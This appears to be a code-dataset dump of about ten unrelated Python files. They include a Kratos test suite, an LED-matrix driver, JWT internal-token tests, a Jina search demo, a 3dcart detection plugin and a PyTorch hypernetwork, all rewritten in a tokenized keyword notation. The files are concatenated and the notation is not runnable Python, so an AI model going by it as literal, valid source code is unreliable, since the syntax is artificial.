content
stringlengths
0
1.55M
# import Kratos <import_stmt>KratosMultiphysics<import_stmt>KratosMultiphysics.MetisApplication<if_stmt><not>KratosMultiphysics.IsDistributedRun()<block_start><raise>Exception("This test script can only be executed in MPI!")<block_end># Import Kratos "wrapper" for unittests <import_stmt>KratosMultiphysics.KratosUnittest<as>KratosUnittest<line_sep># Import the tests o test_classes to create the suits <import_from_stmt>test_metis_submodelpart_list TestMetisSubModelPartList<def_stmt>AssembleTestSuites <block_start>''' Populates the test suites to run. Populates the test suites to run. At least, it should pupulate the suites: "mpi_small", "mpi_nightly" and "mpi_all" Return ------ suites: A dictionary of suites The set of suites with its test_cases added. '''<line_sep>suites=KratosUnittest.KratosSuites<line_sep># Create a test suit with the selected tests (Small tests): # smallSuite will contain the following tests: # - testSmallExample smallMPISuite=suites['mpi_small']<line_sep>smallMPISuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([TestMetisSubModelPartList]))<line_sep># Create a test suit with the selected tests # nightSuite will contain the following tests: # - testSmallExample # - testNightlyFirstExample # - testNightlySecondExample nightMPISuite=suites['mpi_nightly']<line_sep>nightMPISuite.addTests(smallMPISuite)<line_sep># Create a test suit that contains all the tests from every testCase # in the list: allMPISuite=suites['mpi_all']<line_sep>allMPISuite.addTests(nightMPISuite)<line_sep><return>suites<block_end><if_stmt>__name__<eq>'__main__'<block_start>KratosUnittest.runTests(AssembleTestSuites())<block_end>
MODE_5X11=0b00000011<class_stmt>I2cConstants<block_start><def_stmt>__init__ self<block_start>self.I2C_ADDR=0x60<line_sep>self.CMD_SET_MODE=0x00<line_sep>self.CMD_SET_BRIGHTNESS=0x19<line_sep>self.MODE_5X11=0b00000011<block_end><block_end><class_stmt>IS31FL3730<block_start><def_stmt>__init__ self smbus font<block_start>self.bus=smbus<line_sep>self.font=font<line_sep>self.i2cConstants=I2cConstants()<line_sep>self._rotate=<false><line_sep>self.bus=self.bus.SMBus(1)<line_sep>self.buffer=[0]<times>11<line_sep>self.offset=0<line_sep>self.error_count=0<line_sep>self.set_mode(self.i2cConstants.MODE_5X11)<block_end><def_stmt>set_rotate self value<block_start>self._rotate=value<block_end><def_stmt>rotate5bits self x<block_start>r=0<if_stmt>x&16<block_start>r=r|1<block_end><if_stmt>x&8<block_start>r=r|2<block_end><if_stmt>x&4<block_start>r=r|4<block_end><if_stmt>x&2<block_start>r=r|8<block_end><if_stmt>x&1<block_start>r=r|16<block_end><return>r<block_end><def_stmt>update self<block_start><if_stmt>self.offset+11<le>len(self.buffer)<block_start>self.window=self.buffer[self.offset:self.offset+11]<block_end><else_stmt><block_start>self.window=self.buffer[self.offset:]<line_sep>self.window<augadd>self.buffer[:11-len(self.window)]<block_end><if_stmt>self._rotate<block_start>self.window.reverse()<for_stmt>i range(len(self.window))<block_start>self.window[i]=self.rotate5bits(self.window[i])<block_end><block_end>self.window.append(0xff)<try_stmt><block_start>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR 0x01 self.window)<block_end><except_stmt>IOError<block_start>self.error_count<augadd>1<if_stmt>self.error_count<eq>10<block_start>print("A high number of IO Errors have occurred, please check your soldering/connections.")<block_end><block_end><block_end><def_stmt>set_mode self mode=MODE_5X11<block_start>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR self.i2cConstants.CMD_SET_MODE [self.i2cConstants.MODE_5X11])<block_end><def_stmt>get_brightness 
self<block_start><if_stmt>hasattr(self 'brightness')<block_start><return>self.brightness<block_end><return>-1<block_end><def_stmt>set_brightness self brightness<block_start>self.brightness=brightness<line_sep>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR self.i2cConstants.CMD_SET_BRIGHTNESS [self.brightness])<block_end><def_stmt>set_col self x value<block_start><if_stmt>len(self.buffer)<le>x<block_start>self.buffer<augadd>[0]<times>(x-len(self.buffer)+1)<block_end>self.buffer[x]=value<block_end><def_stmt>write_string self chars x=0<block_start><for_stmt>char chars<block_start><if_stmt>ord(char)<eq>0x20<or>ord(char)<not><in>self.font<block_start>self.set_col(x 0)<line_sep>x<augadd>1<line_sep>self.set_col(x 0)<line_sep>x<augadd>1<line_sep>self.set_col(x 0)<line_sep>x<augadd>1<block_end><else_stmt><block_start>font_char=self.font[ord(char)]<for_stmt>i range(0 len(font_char))<block_start>self.set_col(x font_char[i])<line_sep>x<augadd>1<block_end>self.set_col(x 0)<line_sep>x<augadd>1# space between chars <block_end><block_end>self.update()<block_end># draw a graph across the screen either using # the supplied min/max for scaling or auto # scaling the output to the min/max values # supplied <def_stmt>graph self values low=<none> high=<none><block_start>values=[float(x)<for>x values]<if_stmt>low<eq><none><block_start>low=min(values)<block_end><if_stmt>high<eq><none><block_start>high=max(values)<block_end>span=high-low<for_stmt>col,value enumerate(values)<block_start>value<augsub>low<line_sep>value<augdiv>span<line_sep>value<augmul>5<if_stmt>value<g>5<block_start>value=5<block_end><if_stmt>value<l>0<block_start>value=0<block_end>self.set_col(col [0 16 24 28 30 31][int(value)])<block_end>self.update()<block_end><def_stmt>set_buffer self replacement<block_start>self.buffer=replacement<block_end><def_stmt>buffer_len self<block_start><return>len(self.buffer)<block_end><def_stmt>scroll self 
delta=1<block_start>self.offset<augadd>delta<line_sep>self.offset<augmod>len(self.buffer)<line_sep>self.update()<block_end><def_stmt>clear_buffer self<block_start>self.offset=0<line_sep>self.buffer=[0]<times>11<block_end><def_stmt>clear self<block_start>self.clear_buffer()<line_sep>self.update()<block_end><def_stmt>load_font self new_font<block_start>self.font=new_font<block_end><def_stmt>scroll_to self pos=0<block_start>self.offset=pos<line_sep>self.offset<augmod>len(self.buffer)<line_sep>self.update()<block_end><def_stmt>io_errors self<block_start><return>self.error_count<block_end><def_stmt>set_pixel self x y value<block_start><if_stmt>value<block_start>self.buffer[x]<augor>(1<lshift>y)<block_end><else_stmt><block_start>self.buffer[x]<augand>~(1<lshift>y)<block_end><block_end><block_end>
<import_stmt>datetime<import_stmt>unittest<import_from_stmt>flask Blueprint request jsonify<import_from_stmt>freezegun freeze_time<import_from_stmt>mock Mock patch<import_stmt>jwt<import_from_stmt>requests.exceptions HTTPError<import_from_stmt>shared_helpers services<import_from_stmt>testing TrottoTestCase LIVE_APP_HOST<class_stmt>TestFunctions(unittest.TestCase)<block_start>@patch('shared_helpers.services.get_service_config' return_value={'signing_secret':'so_secret'})<def_stmt>test__create_internal_token self mock_get_service_config<block_start>now=datetime.datetime.now(datetime.timezone.utc)<with_stmt>freeze_time(now)<block_start>token=services._create_internal_token('my_service' {'id':1})<line_sep>self.assertEqual({'exp':int(now.timestamp())+30 'id':1} jwt.decode(token 'so_secret' algorithms=['HS256']))<block_end><with_stmt>freeze_time(now+datetime.timedelta(seconds=40))<block_start><with_stmt>self.assertRaises(jwt.exceptions.ExpiredSignatureError)<block_start>jwt.decode(token 'so_secret' algorithms=['HS256'])<block_end><block_end>mock_get_service_config.assert_called_once_with('my_service')<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to'})<def_stmt>test_get__basic self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.json.return_value={'id':1}<line_sep>mock_requests_get.return_value=mock_response<line_sep>self.assertEqual({'id':1} services.get('my_service' 'api/users'))<line_sep>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' 
headers={'X-Token':'internal_token'})<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to/'})<def_stmt>test_get__trailing_and_leading_slashes self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.json.return_value={'id':1}<line_sep>mock_requests_get.return_value=mock_response<line_sep>self.assertEqual({'id':1} services.get('my_service' '/api/users'))<line_sep>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' headers={'X-Token':'internal_token'})<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to'})<def_stmt>test_get__http_error self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.raise_for_status.side_effect=HTTPError<line_sep>mock_requests_get.return_value=mock_response<with_stmt>self.assertRaises(HTTPError)<block_start>services.get('my_service' 'api/users')<block_end>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' headers={'X-Token':'internal_token'})<block_end><def_stmt>test_validate_internal_request__no_token 
self<block_start>mock_request=Mock()<line_sep>mock_request.headers={}<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('no token' str(cm.exception))<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__invalid_signature__wrong_secret self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users'} 'a_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('invalid signature' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__invalid_signature__no_exp self mock_get_config_by_key_path<block_start>token=jwt.encode({'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('missing exp' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__expired_token self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()-datetime.timedelta(seconds=1) 
'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('expired' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__mismatched_url self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users/1'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('mismatched URL' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__valid_token self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<line_sep>self.assertEqual(<true> services.validate_internal_request(mock_request))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end><block_end>routes=Blueprint('test' __name__)<line_sep>@routes.route('/_/api/users' methods=['GET'])<def_stmt>get_users 
<block_start>services.validate_internal_request(request)<line_sep><return>jsonify([{'id':1}])<block_end><class_stmt>TestIntegration(TrottoTestCase)<block_start>blueprints_under_test=[routes]<line_sep>start_live_app=<true><line_sep>live_app_config={'sessions_secret':'a_sessions_secret' 'signing_secret':'so_secret' 'postgres':{'url':'postgresql://admin:testing@/testing_trotto_core'}}<line_sep>@patch('shared_helpers.config.get_config' return_value={'services':{'my_service':{'signing_secret':'so_secret' 'base_url':LIVE_APP_HOST}}})<def_stmt>test_internal_request__real_handler__valid_token self _<block_start>self.assertEqual([{'id':1}] services.get('my_service' '/_/api/users'))<block_end>@patch('shared_helpers.config.get_config' return_value={'services':{'my_service':{'signing_secret':'a_secret' 'base_url':LIVE_APP_HOST}}})<def_stmt>test_internal_request__real_handler__invalid_token self _<block_start><with_stmt>self.assertRaises(HTTPError)<as>cm<block_start>self.assertEqual([{'id':1}] services.get('my_service' '/_/api/users'))<block_end>self.assertEqual(500 cm.exception.response.status_code)<block_end><block_end>
__copyright__="Copyright (c) 2021 Jina AI Limited. All rights reserved."<line_sep>__license__="Apache-2.0"<import_stmt>os<import_stmt>sys<import_stmt>click<import_stmt>random<import_from_stmt>jina Flow Document DocumentArray<import_from_stmt>jina.logging.predefined default_logger<as>logger<line_sep>MAX_DOCS=int(os.environ.get('JINA_MAX_DOCS' 10000))<def_stmt>config dataset:str<block_start><if_stmt>dataset<eq>'toy'<block_start>os.environ['JINA_DATA_FILE']=os.environ.get('JINA_DATA_FILE' 'data/toy-input.txt')<block_end><elif_stmt>dataset<eq>'full'<block_start>os.environ['JINA_DATA_FILE']=os.environ.get('JINA_DATA_FILE' 'data/input.txt')<block_end>os.environ['JINA_PORT']=os.environ.get('JINA_PORT' str(45678))<line_sep>cur_dir=os.path.dirname(os.path.abspath(__file__))<line_sep>os.environ.setdefault('JINA_WORKSPACE' os.path.join(cur_dir 'workspace'))<line_sep>os.environ.setdefault('JINA_WORKSPACE_MOUNT' f'{os.environ.get("JINA_WORKSPACE")}:/workspace/workspace')<block_end><def_stmt>print_topk resp sentence<block_start><for_stmt>doc resp.data.docs<block_start>print(f"\n\n\nTa-Dah🔮, here's what we found for: {sentence}")<for_stmt>idx,match enumerate(doc.matches)<block_start>score=match.scores['cosine'].value<line_sep>print(f'> {idx:>2d}({score:.2f}). 
{match.text}')<block_end><block_end><block_end><def_stmt>input_generator num_docs:int file_path:str<block_start><with_stmt>open(file_path)<as>file<block_start>lines=file.readlines()<block_end>num_lines=len(lines)<line_sep>random.shuffle(lines)<for_stmt>i range(min(num_docs num_lines))<block_start><yield>Document(text=lines[i])<block_end><block_end><def_stmt>index num_docs<block_start>flow=Flow().load_config('flows/flow.yml')<line_sep>data_path=os.path.join(os.path.dirname(__file__) os.environ.get('JINA_DATA_FILE' <none>))<with_stmt>flow<block_start>flow.post(on='/index' inputs=input_generator(num_docs data_path) show_progress=<true>)<block_end><block_end><def_stmt>query top_k<block_start>flow=Flow().load_config('flows/flow.yml')<with_stmt>flow<block_start>text=input('Please type a sentence: ')<line_sep>doc=Document(content=text)<line_sep>result=flow.post(on='/search' inputs=DocumentArray([doc]) parameters={'top_k':top_k} line_format='text' return_results=<true> )<line_sep>print_topk(result[0] text)<block_end><block_end>@click.command()@click.option('--task' '-t' type=click.Choice(['index' 'query'] case_sensitive=<false>) )@click.option('--num_docs' '-n' default=MAX_DOCS)@click.option('--top_k' '-k' default=5)@click.option('--dataset' '-d' type=click.Choice(['toy' 'full']) default='toy')<def_stmt>main task num_docs top_k dataset<block_start>config(dataset)<if_stmt>task<eq>'index'<block_start><if_stmt>os.path.exists(os.environ.get("JINA_WORKSPACE"))<block_start>logger.error(f'\n +---------------------------------------------------------------------------------+ \ \n | 🤖🤖🤖 | \ \n | The directory {os.environ.get("JINA_WORKSPACE")} already exists. Please remove it before indexing again. 
| \ \n | 🤖🤖🤖 | \ \n +---------------------------------------------------------------------------------+')<line_sep>sys.exit(1)<block_end>index(num_docs)<block_end><elif_stmt>task<eq>'query'<block_start>query(top_k)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_from_stmt>tableschema Table<line_sep># Data from WEB, schema from MEMORY SOURCE='https://raw.githubusercontent.com/frictionlessdata/tableschema-py/master/data/data_infer.csv'<line_sep>SCHEMA={'fields':[{'name':'id' 'type':'integer'} {'name':'age' 'type':'integer'} {'name':'name' 'type':'string'}]}<line_sep># If schema is not passed it will be inferred table=Table(SOURCE schema=SCHEMA)<line_sep>rows=table.iter()<while_stmt><true><block_start><try_stmt><block_start>print(next(rows))<block_end><except_stmt>StopIteration<block_start><break><block_end><except_stmt>Exception<as>exception<block_start>print(exception)<block_end><block_end>
<import_stmt>re<import_stmt>lib.core.common<line_sep>__product__="3dcart"<line_sep>__description__=("The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone.")<def_stmt>search html **kwargs<block_start>html=str(html)<line_sep>headers=kwargs.get("headers" <none>)<line_sep>plugin_detection_schema=(re.compile(r"3dcart.stats" re.I) re.compile(r"/3dvisit/" re.I))<for_stmt>plugin plugin_detection_schema<block_start><if_stmt>plugin.search(html)<is><not><none><block_start><return><true><block_end><if_stmt>plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE ""))<is><not><none><block_start><return><true><block_end><block_end><block_end>
expected_output={"tag":{"test":{"system_id":{"R2_xr":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.01" "format":"Phase V" "interface":"GigabitEthernet2.115" "ip_address":["10.12.115.2*"] "ipv6_address":["FE80::F816:3EFF:FE67:2452"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} "R3_nx":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.02" "format":"Phase V" "interface":"GigabitEthernet3.115" "ip_address":["10.13.115.3*"] "ipv6_address":["FE80::5C01:FF:FE02:7"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} }} "test1":{"system_id":{"2222.22ff.4444":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"2222.22ff.4444.01" "format":"Phase V" "interface":"GigabitEthernet2.415" "ip_address":["10.12.115.2*"] "ipv6_address":["FE80::F816:3EFF:FE67:2452"] "nsf":"capable" "priority":128 "state":"init" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} "R3_nx":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.02" "format":"Phase V" "interface":"GigabitEthernet3.415" "ip_address":["10.13.115.3*"] "ipv6_address":["FE80::5C01:FF:FE02:7"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} }} }}<line_sep>
<import_from_stmt>wasmer engine Store Module Instance<import_from_stmt>wasmer_compiler_cranelift Compiler<as>Cranelift<import_from_stmt>wasmer_compiler_llvm Compiler<as>LLVM<import_from_stmt>wasmer_compiler_singlepass Compiler<as>Singlepass<line_sep>TEST_BYTES=open('benchmarks/nbody.wasm' 'rb').read()<def_stmt>test_benchmark_headless_time_nbody_cranelift_jit benchmark<block_start>store=Store(engine.JIT(Cranelift))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_cranelift_native benchmark<block_start>store=Store(engine.Native(Cranelift))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_llvm_jit benchmark<block_start>store=Store(engine.JIT(LLVM))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_llvm_native benchmark<block_start>store=Store(engine.Native(LLVM))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_singlepass_jit benchmark<block_start>store=Store(engine.JIT(Singlepass))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store 
serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_singlepass_native benchmark<block_start>store=Store(engine.Native(Singlepass))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end>
<class_stmt>CliArgs(object)<block_start><def_stmt>__init__ self<block_start>self.search=[]<line_sep>self.all=<false><line_sep>self.slim=<false><line_sep>self.include=<false><line_sep>self.order=<false><line_sep>self.reverse=<false><line_sep>self.json=<false><line_sep>self.version=<false><block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>physics_aware_training.digital_twin_utils<class_stmt>SplitInputParameterNet(nn.Module)<block_start><def_stmt>__init__ self input_dim nparams output_dim parameterNunits=[100 100 100] internalNunits=[10 10 10]<block_start>''' Defines network that splits inputs x into physical system input and parameters. Inputs are propagated through a "main" neural network whose weights are predicted by an auxiliary neural network whose inputs are the parameters. Args: inputDim (int): dimension of physical system inputs outputDim (int): dimension of physical system outputs parameterDim (int): dimension of all physical system parameters combined parameterNunits (list of int): defines the number of hidden units per layer in the auxiliary parameter network. internalDim (int): number of hidden units per layer of the main neural network that propagates physical system inputs inputNlayers (int): number of hidden layers of main neural network '''<line_sep>super(SplitInputParameterNet self).__init__()<line_sep>self.input_dim=input_dim<line_sep>self.nparams=nparams<line_sep>self.output_dim=output_dim<line_sep>self.internalNunits=internalNunits<line_sep>self.inputNlayers=len(internalNunits)<line_sep>nparameters=0<for_stmt>i range(len(internalNunits)-1)<block_start>nparameters<augadd>internalNunits[i]<times>internalNunits[i+1]<line_sep>nparameters<augadd>internalNunits[i+1]<block_end># parameterNet is a submodel that predicts a matrix of dimensions self.parameterNet=torch.nn.Sequential()<line_sep>self.parameterNet.add_module("fcIn" torch.nn.Linear(nparams parameterNunits[0]))<for_stmt>i range(len(parameterNunits))<block_start><if_stmt>i<l>len(parameterNunits)-1<block_start>self.parameterNet.add_module(f"relu{i}" torch.nn.ReLU())<line_sep>self.parameterNet.add_module(f"fc{i}" torch.nn.Linear(parameterNunits[i] parameterNunits[i+1]))<block_end><else_stmt><block_start>self.parameterNet.add_module(f"relu{i}" 
torch.nn.ReLU())<line_sep>self.parameterNet.add_module(f"fcOut" torch.nn.Linear(parameterNunits[i] nparameters))<block_end><block_end># two fully connected input and output layers adjust the input and output dimenstion to # the internal dimension self.fcIn=nn.Linear(input_dim internalNunits[0])<line_sep>self.fcOut=nn.Linear(internalNunits[-1] output_dim)<block_end><def_stmt>forward self x<block_start>batch_size,_=x.shape<line_sep># initialize matrices for inputNet inputNetMatrices=[]<line_sep>inputNetBiases=[]<for_stmt>i range(len(self.internalNunits)-1)<block_start>inputNetMatrices.append([torch.zeros(batch_size self.internalNunits[i] self.internalNunits[i+1])])<line_sep>inputNetBiases.append([torch.zeros(batch_size self.internalNunits[i+1] 1)])<block_end># split x into physical system inputs and parameters inputs=x[: :self.input_dim]<line_sep>parameters=x[: self.input_dim:]<line_sep># AUXILIARY PARAMETER NETWORK parameters=self.parameterNet(parameters)<line_sep># fill inputNetMatrices with outputs from parameterNet index=0<for_stmt>i range(len(self.internalNunits)-1)<block_start>index_temp=index<line_sep>index<augadd>self.internalNunits[i]<times>self.internalNunits[i+1]<line_sep>inputNetMatrices[i]=parameters[: index_temp:index].reshape(batch_size self.internalNunits[i+1] self.internalNunits[i])<block_end># fill inputNetBiases with outputs from parameterNet <for_stmt>i range(len(self.internalNunits)-1)<block_start>index_temp=index<line_sep>index<augadd>self.internalNunits[i+1]<line_sep>inputNetBiases[i]=parameters[: index_temp:index].reshape(batch_size self.internalNunits[i+1] 1)<block_end># MAIN INPUT NETWORK inputs=self.fcIn(inputs).unsqueeze(-1)<line_sep># MAIN INPUT NETWORK <for_stmt>i range(len(self.internalNunits)-1)# apply matrices and biases just filled with outputs from parameterNet <block_start>inputs=torch.bmm(inputNetMatrices[i] 
inputs)<line_sep>inputs<augadd>inputNetBiases[i]<line_sep>inputs=torch.relu(inputs)<block_end><return>self.fcOut(inputs.squeeze(-1))<block_end><block_end><class_stmt>SplitInputParameterObjective(object)# define class to smuggle additional arguments into objective function <block_start><def_stmt>__init__ self train_loader test_loader dt_path input_dim nparams output_dim **modelargs<block_start>self.modelargs=modelargs<line_sep>self.dt_path=dt_path<line_sep>self.train_loader=train_loader<line_sep>self.test_loader=test_loader<line_sep>self.input_dim=input_dim<line_sep>self.nparams=nparams<line_sep>self.output_dim=output_dim<block_end><def_stmt>__call__ self trial<block_start>lr=trial.suggest_loguniform("lr" 1e-4 1e-1)<line_sep>parameterNlayers=trial.suggest_categorical("parameterNlayers" [1 2 3 4 5])<line_sep>parameterNunits=[]<if_stmt>parameterNlayers<eq>1<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>2<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>3<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>4<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits4" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>5<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 
1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits4" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits5" 50 1000)))<block_end>internalNlayers=trial.suggest_categorical("internalNlayers" [1 2 3 4 5])<line_sep>internalNunits=[]<if_stmt>parameterNlayers<eq>1<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<block_end><if_stmt>parameterNlayers<eq>2<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<block_end><if_stmt>parameterNlayers<eq>3<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<block_end><if_stmt>parameterNlayers<eq>4<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits4" 10 100)))<block_end><if_stmt>parameterNlayers<eq>5<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits4" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits5" 10 100)))<block_end>name=f"{self.dt_path}_v{trial.number}"#create name with trial index 
value,model_path=physics_aware_training.digital_twin_utils.train_loop_reg_model(self.train_loader self.test_loader name self.input_dim self.nparams self.output_dim Model=SplitInputParameterNet parameterNunits=parameterNunits internalNunits=internalNunits lr=lr **self.modelargs)<line_sep>trial.set_user_attr('model_path' model_path)#save the model path string in NAS study <return>value<block_end><block_end>
